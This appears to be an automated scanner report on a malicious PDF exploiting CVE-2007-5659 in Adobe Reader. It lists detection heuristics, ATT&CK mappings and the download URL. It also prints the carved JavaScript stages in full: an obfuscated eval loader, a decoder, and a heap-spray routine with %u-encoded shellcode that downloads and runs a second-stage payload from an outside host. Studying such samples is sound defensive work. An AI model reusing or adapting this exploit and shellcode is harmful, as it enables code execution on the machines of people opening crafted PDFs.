Verdict: MALICIOUS
Risk Score: 318

Malware Insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions affected by APSB08-13. The script is designed to download a second-stage payload from the URL http://danenskgela.com/nte/avorp1rfx.php/... The embedded JavaScript and exploit cluster firings strongly indicate a malicious intent to execute arbitrary code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE match: exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low; 4 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE match: likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-36079 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-36079.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://danenskgela.com/nte/avorp1rfx.php/yU230d9c2eH58cb7138V03003f36002Rb01ced4f102T9393ea18Q00000000901801F0035010aJ0f000601l0007 (referenced by PDF JavaScript)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0007_000.js
- Hash: ef8bdac794684ae9cd4eb7091d80e1c5ca478c06c639d72d01626c1f7ce78b6d
- Kind: pdf-javascript-stream
- Source: PDF /JS object 7 at offset 0x19C
- Size: 578 bytes
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
function dskp(s) {s = s.split('%'); r = ''; for (c in s) {if (!s[c]) continue; r += String.fromCharCode(parseInt(s[c], 16));} return r;}vd = ''; vnt = event; r = (r = 'l' + vd + 'a' + 'ce', 'rep' + r); if (!vd && r) {var z; tis = vnt['tar' + vd + 'get'];var e = vd + 'v' + 'a'; e = vd + 'e' + e; e = tis[e + 'l']; var y; z = y = tis;
y = 0; sas = 'sync'; sas += 'An' + vd + 'notS' + 'can'; z[sas] ( ); y = z;sbj = 'su' + 'bject';var p = y['g'+'et'+'Azots'[r](/z/, 'nn')]( { nPage: 0 }) ;var s = p[0][sbj];var l = s[r](/rz /g, 'q%p'[r](/[qp]/g, ''));s = dskp (l) ;e(s);}
Artifact 2: legacy_pdfkit_stage_000.js
- Hash: 145dd7776f2f48461da7a9f6d9c832fdd70fc15a81bb9ce8e35fab0ae9dcf315
- Kind: deobfuscated-js
- Source: repeated-marker hex decoded JavaScript at offset 0x36F
- Size: 12822 bytes
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
function q3f_i5D8_g(PPg_1hgp__h, NqkSo2l){BN6Ukh8MxfG4 = ''; X_6_E2j_8 = "oS" + "t" + "r" + "in" + "g";X_6_E2j_8 = "t" + X_6_E2j_8;var eQ_73__UW4oX4r = 'um' + 'en' + "ts";eQ_73__UW4oX4r = 'a' + 'rg' + eQ_73__UW4oX4r;var BN6Ukh8MxfG4 = q3f_i5D8_g[eQ_73__UW4oX4r]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];BN6Ukh8MxfG4 = BN6Ukh8MxfG4[X_6_E2j_8]();var LM_7_8q = 0;try{if (app){LM_7_8q++;LM_7_8q++;}}catch(e){}var BAhQ0_c_XD = new Array();if (PPg_1hgp__h){ BAhQ0_c_XD = PPg_1hgp__h;}else{var r52K__w56y = 0;var g__6q48_K = 0;var M5U8twE6328PX4v = 512;var d0ac6___k6v_TIw = 52;d0ac6___k6v_TIw = d0ac6___k6v_TIw - 4;var bP_H6X = d0ac6___k6v_TIw + 9;while(g__6q48_K < BN6Ukh8MxfG4['le'+'ngth']){var OMA0si4QE0 = 1;var m0IwR3hS = BN6Ukh8MxfG4['c'+'h'+'arC'+'odeAt'](g__6q48_K);if (m0IwR3hS <= bP_H6X && m0IwR3hS >= d0ac6___k6v_TIw){if (r52K__w56y == 4){r52K__w56y = 0;}if (isNaN(BAhQ0_c_XD[r52K__w56y])){BAhQ0_c_XD[r52K__w56y] = 0;}BAhQ0_c_XD[r52K__w56y] += m0IwR3hS;if (BAhQ0_c_XD[r52K__w56y] > 512){BAhQ0_c_XD[r52K__w56y] -= M5U8twE6328PX4v;}r52K__w56y++;}g__6q48_K++;}}var kSF_6_iabo8 = 0;r52K__w56y = 4;for (; kSF_6_iabo8 < 4; ++kSF_6_iabo8){if (BAhQ0_c_XD[kSF_6_iabo8] > 256){BAhQ0_c_XD[kSF_6_iabo8] -= 256;}}var G_3s__LCr_4BX = 0;var IP_hnhmUA0u;var VV_5Y5__JcsK1j = 0;var s_m7uc3d2 = 0;var H_bVNC1F = 0;var W_8K5_C_B1d22E6 = "";while(H_bVNC1F < NqkSo2l.length){var u2____3__J7g = NqkSo2l.substr(H_bVNC1F, 1) + "Z";var c6iu_aS_x = parseInt(u2____3__J7g, 16);if (G_3s__LCr_4BX){IP_hnhmUA0u += c6iu_aS_x;if (s_m7uc3d2 == 4){s_m7uc3d2 -= 4;}var A_on___RY = IP_hnhmUA0u;A_on___RY = A_on___RY - (1 + VV_5Y5__JcsK1j + 1) * BAhQ0_c_XD[s_m7uc3d2];if (A_on___RY < 0){var aC__rYni_us = 256;A_on___RY = A_on___RY - Math['floor'](A_on___RY / aC__rYni_us) * 256;}A_on___RY = String['from' + 'CharCode'](A_on___RY);if (LM_7_8q == 2){W_8K5_C_B1d22E6 += A_on___RY;}else if (LM_7_8q == 1){W_8K5_C_B1d22E6 += c6iu_aS_x;}else{W_8K5_C_B1d22E6 += H_bVNC1F;}s_m7uc3d2++;G_3s__LCr_4BX = 
0;VV_5Y5__JcsK1j++;}else{G_3s__LCr_4BX = 1;IP_hnhmUA0u = c6iu_aS_x * 16;}H_bVNC1F++;};drqjq = 1 ; brin = 5;;var pywgI1Hk86b3h = this;pywgI1Hk86b3h['e' + 'val'](W_8K5_C_B1d22E6);}
q3f_i5D8_g
... (truncated)
Artifact 3: legacy_pdfkit_stage_001.js
- Hash: 44b758ca5e82e82237ad78ccf0f71a3a03c2519e840493ada3ab9db643ceb03f
- Kind: deobfuscated-js
- Source: repeated-marker hex decoded JavaScript at offset 0x36F
- Size: 5321 bytes
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
var HdR7IKw71A8 = new Array();var u_R8_q = 0;var B_0Tt64_s = "";function q4x3h_EQ_1A(a_0RXD5_WK2p0E, i___l2__7J_Y){var e__R48XE420_j = i___l2__7J_Y.toString();var Sh_3_7_J87jvwT = "";for(var Eq_0l_3G_DpY = 0; Eq_0l_3G_DpY < e__R48XE420_j.length; Eq_0l_3G_DpY++) {var d_7_4qnY_0 = parseInt(e__R48XE420_j.substr(Eq_0l_3G_DpY, 1));if (!isNaN(d_7_4qnY_0)) {d_7_4qnY_0 = d_7_4qnY_0.toString(16);if (d_7_4qnY_0.length == 1) { d_7_4qnY_0 = "0" + d_7_4qnY_0; }else if (d_7_4qnY_0.length != 2) { d_7_4qnY_0 = "00"; }Sh_3_7_J87jvwT = d_7_4qnY_0 + Sh_3_7_J87jvwT;}}while(Sh_3_7_J87jvwT.length < 8) { Sh_3_7_J87jvwT = "0" + Sh_3_7_J87jvwT; }var LFB3uYNm_OG85 = a_0RXD5_WK2p0E.toString(16);if (LFB3uYNm_OG85.length == 1) { LFB3uYNm_OG85 = "0" + LFB3uYNm_OG85; }else if (LFB3uYNm_OG85.length != 2) { LFB3uYNm_OG85 = "00"; }Sh_3_7_J87jvwT = "3" + LFB3uYNm_OG85 + "P" + Sh_3_7_J87jvwT;return Sh_3_7_J87jvwT;}function LAN4_Ur_h6_w(s6kArVjX2y32, k_NbJb6t){var i_r_v8_i = new Array("");var QY1x5__eJp_c = s6kArVjX2y32;var a1lVgyCM7n;if ((a1lVgyCM7n = s6kArVjX2y32.lastIndexOf("%u00")) != -1) {if (a1lVgyCM7n + 6 == s6kArVjX2y32.length) {i_r_v8_i[0] = s6kArVjX2y32.substr(a1lVgyCM7n + 4, 2);QY1x5__eJp_c = s6kArVjX2y32.substring(0, a1lVgyCM7n);}}a1lVgyCM7n = 1;for (Eq_0l_3G_DpY = 0; Eq_0l_3G_DpY < k_NbJb6t.length; Eq_0l_3G_DpY++) {var loNAh__u___I = k_NbJb6t.charCodeAt(Eq_0l_3G_DpY).toString(16);if (loNAh__u___I.length == 1) { loNAh__u___I = "0" + loNAh__u___I; }i_r_v8_i[a1lVgyCM7n] = loNAh__u___I;a1lVgyCM7n++;}Eq_0l_3G_DpY = i_r_v8_i[0].length ? 
0 : 1;i_r_v8_i[a1lVgyCM7n] = "00";i_r_v8_i[a1lVgyCM7n + 1] = "00";a1lVgyCM7n += 2;if ((i_r_v8_i.length - Eq_0l_3G_DpY) % 2) {i_r_v8_i[a1lVgyCM7n] = "00";}while(Eq_0l_3G_DpY < i_r_v8_i.length) {QY1x5__eJp_c += "%u" + i_r_v8_i[Eq_0l_3G_DpY + 1] + i_r_v8_i[Eq_0l_3G_DpY];Eq_0l_3G_DpY += 2;}QY1x5__eJp_c += "%u0000";return QY1x5__eJp_c;}function q_K4qHemFp(q_G_LB1eI_e__x, p__Rf_DC1Jy){while (q_G_LB1eI_e__x.length*2<p__Rf_DC1Jy) {q_G_LB1eI_e__x += q_G_LB1eI_e__x;}q_G_LB1eI_e__x = q_G_LB1eI_e__x.substring(0,p__Rf_DC1Jy/2);return q_G_LB1eI_e__x;}function uluy2u48yc_Axf(C6aC_36N3_Veh, FXC_i_L8hdn__w5, N_B_j25_P5F__3){var m7v_KG = 0x0c0c0c0c;var q_G_LB1eI_e__x = unescape(FXC_i_L8hdn__w5);var k_NbJb6t = q4x3h_EQ_1A(C6aC_36N3_Veh, N_B_j25_P5F__3);var uI7__l3o = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var s6kArVjX2y32 = "%u9050%u9050%u9050%u9050" + 
"%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4d70%u4e66%u0050%u7468%u7074%u2f3a%u642f%u6e61%u6e65%u6b73%u6567%u616c%u632e%u6d6f%u6e2f%u6574%u612f%u6f76%u7072%u7231%u7866%u702e%u7068%u792f%u3255%u3033%u3964%u3263%u4865%u3835%u6263%u3137%u3833%u3056%u3033%u3330%u3366%u3036%u3230%u6252%u3130%u6563%u3464%u3166%u3230%u3954%u3933%u6533%u3161%u5138%u3030%u3030%u3030%u3030%u3039%u3831%u3130%u3046%u3330%u3035%u3031%u4a61%u6630%u3030%u3630%u3130%u306c%u3030%u0037";app.T_6dseo_4__l_31 = unescape(LAN4_Ur_h6_w(s6kArVjX2y32, k_NbJb6t));var v_Oj_3__1___J = 0x400000;var OJ5_N4O6i = uI7__l3o.length * 2;var p__Rf_DC1Jy = v_Oj_3__1___J - (OJ5_N4O6i+0x38);q_G_LB1eI_e__x = q_K4qHemFp(q_G_LB1eI_e__x, p__Rf_DC1Jy);var fv5Q5_QkLNS = (m7v
... (truncated)